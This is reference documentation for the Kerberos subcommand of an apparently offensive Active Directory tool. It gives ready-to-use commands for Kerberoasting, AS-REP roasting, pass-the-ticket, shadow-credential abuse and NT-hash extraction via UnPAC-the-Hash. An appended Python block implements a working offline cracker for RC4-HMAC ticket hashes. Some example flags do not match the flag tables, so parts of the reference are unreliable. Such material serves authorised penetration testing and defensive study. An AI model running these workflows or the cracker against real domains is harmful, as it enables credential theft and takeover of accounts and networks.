krb (Kerberos)

The krb command provides Kerberos ticket operations: obtaining TGTs and TGSs, and extracting NT hashes via PKINIT + UnPAC-the-Hash.

Usage

r4t krb <subcommand> [flags]

Persistent Flags

Flag     Description
--dcs    Load domain controllers from the database as targets

Subcommands

krb tgt

Obtain a Ticket Granting Ticket (TGT) for an account.
# Using stored credential (password or hash)
r4t krb tgt

# Specific target DC
r4t krb tgt dc01.corp.example.com

# With explicit credentials
r4t krb tgt -u jsmith -p 'P@ssword1' -d corp.example.com dc01.corp.example.com

# Using AES key
r4t krb tgt --aes <aes-key> -u jsmith -d corp.example.com

# Using PFX certificate (PKINIT)
r4t krb tgt --pfx /tmp/user.pfx dc01.corp.example.com

# Using shadow credential private key (no cert, key-only PKINIT)
r4t krb tgt --key /tmp/shadow.key -u jsmith -d corp.example.com

Flags

Flag             Description
--upn            User Principal Name (optional override)
--key            Private key file for shadow credential / key-only PKINIT
--pfx            PFX file for PKINIT authentication
--pfx-password   PFX passphrase
--aes            AES-128 or AES-256 key
The resulting TGT is:
  • Written to a ccache file (path printed to stdout)
  • Stored in the tgts table in SQLite
  • Linked to the active credential record

krb tgs

Obtain a Ticket Granting Service ticket (TGS) for a specific SPN. Used for Kerberoasting.
# Get TGS for a specific SPN
r4t krb tgs --spn "HTTP/app.corp.example.com"

# With SID targeting
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433" --sid S-1-5-21-...

Flags

Flag     Description
--spn    Target Service Principal Name (required)
--sid    Target account SID
The resulting TGS is:
  • Written as a kirbi/ccache file
  • Output in hashcat format for offline cracking ($krb5tgs$23$..., where 23 is the RC4-HMAC encryption type; hashcat mode 13100)
  • Stored in the tgss table, with the hash in kerberoast_hashes

krb nt

Extract the NT hash of an account using PKINIT + UnPAC-the-Hash. This requires a valid certificate (or shadow-credential key) for the target account. The account authenticates to the KDC via PKINIT and receives a TGT. For PKINIT logons the KDC includes a PAC_CREDENTIAL_INFO buffer in the PAC (Privilege Attribute Certificate) that carries the account's NT hash, encrypted with the AS-REP reply key. Because the TGT's PAC is encrypted with the krbtgt key, UnPAC-the-Hash obtains a readable copy by requesting a user-to-user (U2U) service ticket for the account itself, then decrypts the buffer to recover the hash.
# Using stored PFX credential
r4t krb nt

# With explicit PFX
r4t krb nt --pfx /tmp/admin.pfx

# Override UPN
r4t krb nt --upn administrator@corp.example.com

Flags

Flag     Description
--upn    Override the UPN used for PKINIT
The extracted NT hash is printed and stored in the credentials table.
This is the same operation as adcs nt — both subcommands perform PKINIT + UnPAC-the-Hash. krb nt is the Kerberos-centric entry point, adcs nt is the ADCS-centric one.

Kerberos Authentication Methods

R4t supports the standard Kerberos pre-authentication methods:

Method              Description
Password            Standard PA-ENC-TIMESTAMP
NT Hash             RC4-HMAC (etype 23) pre-auth
AES Key             AES-128 or AES-256 pre-auth
PKINIT (PFX)        Public key pre-authentication with a PFX certificate
PKINIT (PEM)        Public key pre-authentication with a PEM cert + key
PKINIT (Key-only)   Shadow credential attack: private key without a certificate

Ticket Storage

Table               Contents
tgts                Kerberos TGTs (base64-encoded ticket, expiry, target DC)
tgss                Kerberos TGSs (ticket, SPN, encryption type)
kerberoast_hashes   Kerberoastable TGS hashes in hashcat format
asrep_hashes        AS-REP roastable hashes

Common Kerberos Workflows

Kerberoasting

# 1. Find Kerberoastable accounts
r4t ldap get spn

# 2. Get TGS for each SPN
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433"

# 3. Crack offline
hashcat -m 13100 kerberoast.hash wordlist.txt

AS-REP Roasting

# Find AS-REP roastable accounts (no pre-auth required)
r4t ldap scan

# View AS-REP hashes
r4t dbquery "SELECT * FROM asrep_hashes"

# Crack offline
hashcat -m 18200 asrep.hash wordlist.txt
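The hashcat lines that krb tgs emits, and the AS-REP lines kept in asrep_hashes, are the RC4-HMAC (etype 23) encrypted part of a service ticket or AS-REP, split into its 16-byte HMAC-MD5 checksum and the RC4 ciphertext. The Python below is an added example, not part of r4t or this documentation: it builds both hashcat formats from a constructed enc-part and then shows what the offline step (hashcat -m 13100 / -m 18200) actually computes for each candidate password: NT hash = MD4(UTF-16LE), the RFC 4757 keys for key usage 2 (ticket) or 8 (AS-REP), RC4 decryption, and checksum verification. The realm, account, SPN, plaintext and confounder are constructed values, and MD4 is implemented inline because hashlib's MD4 is often disabled under OpenSSL 3.

```python
import hashlib
import hmac
import struct

# Constructed sample identifiers for the demonstration (not from any real domain).
REALM = "CORP.EXAMPLE.COM"
USER = "svc_sql"
SPN = "MSSQLSvc/sql.corp.example.com:1433"
KEY_USAGE_TICKET = 2   # RFC 4757 message type for a ticket enc-part (hashcat 13100)
KEY_USAGE_AS_REP = 8   # RFC 4757 message type for the AS-REP enc-part (hashcat 18200)

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.md4 is frequently unavailable."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: (((x & 0xFFFFFFFF) << n) | ((x & 0xFFFFFFFF) >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2k = [(i % 4) * 4 + i // 4 for i in range(16)]            # 0,4,8,12,1,5,...
    r3k = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1
            a, b, c, d = d, rol(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rol(a + G(b, c, d) + X[r2k[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rol(a + H(b, c, d) + X[r3k[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = (A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF, (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF
    return struct.pack("<4I", A, B, C, D)

def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:     # keystream generation; same routine encrypts and decrypts
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))  # the NT hash is the etype-23 Kerberos key

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: output = HMAC-MD5 checksum (16 bytes) || RC4_K3(confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, confounder + plaintext)

def tgs_to_hashcat(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    # hashcat 13100: first 16 bytes of the enc-part are the checksum, the rest is edata
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"

def asrep_to_hashcat(user: str, realm: str, enc_part: bytes) -> str:
    # hashcat 18200: same split, different key usage when cracking
    return f"$krb5asrep$23${user}@{realm}:{enc_part[:16].hex()}${enc_part[16:].hex()}"

def parse_hashcat(line: str):
    """Return (key_usage, checksum, edata) for a $krb5tgs$23$ or $krb5asrep$23$ line."""
    if line.startswith("$krb5tgs$23$*"):
        tail, usage = line.split("*$", 1)[1], KEY_USAGE_TICKET   # "<checksum>$<edata>"
    elif line.startswith("$krb5asrep$23$"):
        tail, usage = line.split(":", 1)[1], KEY_USAGE_AS_REP
    else:
        raise ValueError("unsupported hash line")
    checksum_hex, edata_hex = tail.split("$", 1)
    return usage, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)

def crack(line: str, wordlist):
    """Offline guess: derive the etype-23 key from each candidate, decrypt, verify the HMAC."""
    usage, checksum, edata = parse_hashcat(line)
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), struct.pack("<I", usage), hashlib.md5).digest()
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        plain = rc4(k3, edata)  # confounder || plaintext if the key is right
        if hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
            return candidate
    return None

# Constructed stand-in for the ASN.1 EncTicketPart / EncASRepPart and a fixed confounder
# (real KDCs use 8 random bytes; fixed here so the sample lines are reproducible).
SAMPLE_PLAINTEXT = b"\x63\x82\x04\x10constructed-ticket-body"
SAMPLE_CONFOUNDER = bytes(range(8))

def sample_lines(password: str):
    key = nt_hash(password)
    tgs = rc4_hmac_encrypt(key, KEY_USAGE_TICKET, SAMPLE_PLAINTEXT, SAMPLE_CONFOUNDER)
    asrep = rc4_hmac_encrypt(key, KEY_USAGE_AS_REP, SAMPLE_PLAINTEXT, SAMPLE_CONFOUNDER)
    return tgs_to_hashcat(USER, REALM, SPN, tgs), asrep_to_hashcat(USER, REALM, asrep)
```

Calling sample_lines("Summer2024!") yields one $krb5tgs$23$ line and one $krb5asrep$23$ line; crack(line, ["Password1", "Winter2023", "Summer2024!"]) recovers "Summer2024!" for both, and returns None when no candidate matches. The key-usage difference (2 versus 8) is why a Kerberoast line and an AS-REP line for the same account and password are not interchangeable, and why hashcat needs separate modes for them.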

Pass-the-Ticket

# Get a TGT and save to ccache
r4t krb tgt -u jsmith --hash <hash> -d corp.example.com

# Use the ccache in subsequent commands
export KRB5CCNAME=/tmp/jsmith.ccache
r4t ldap get users --ccache /tmp/jsmith.ccache

Shadow Credential Attack

# 1. Inject a key credential (via ldap dacl + modify or dedicated tool)
# 2. Get TGT using the private key
r4t krb tgt --key /tmp/injected.key -u targetuser -d corp.example.com

# 3. Extract NT hash
r4t krb nt --key /tmp/injected.key -u targetuser -d corp.example.com

PKINIT from ADCS Certificate

# After obtaining a certificate via adcs req
r4t krb tgt --pfx /tmp/admin.pfx

# Or extract the NT hash directly
r4t krb nt --pfx /tmp/admin.pfx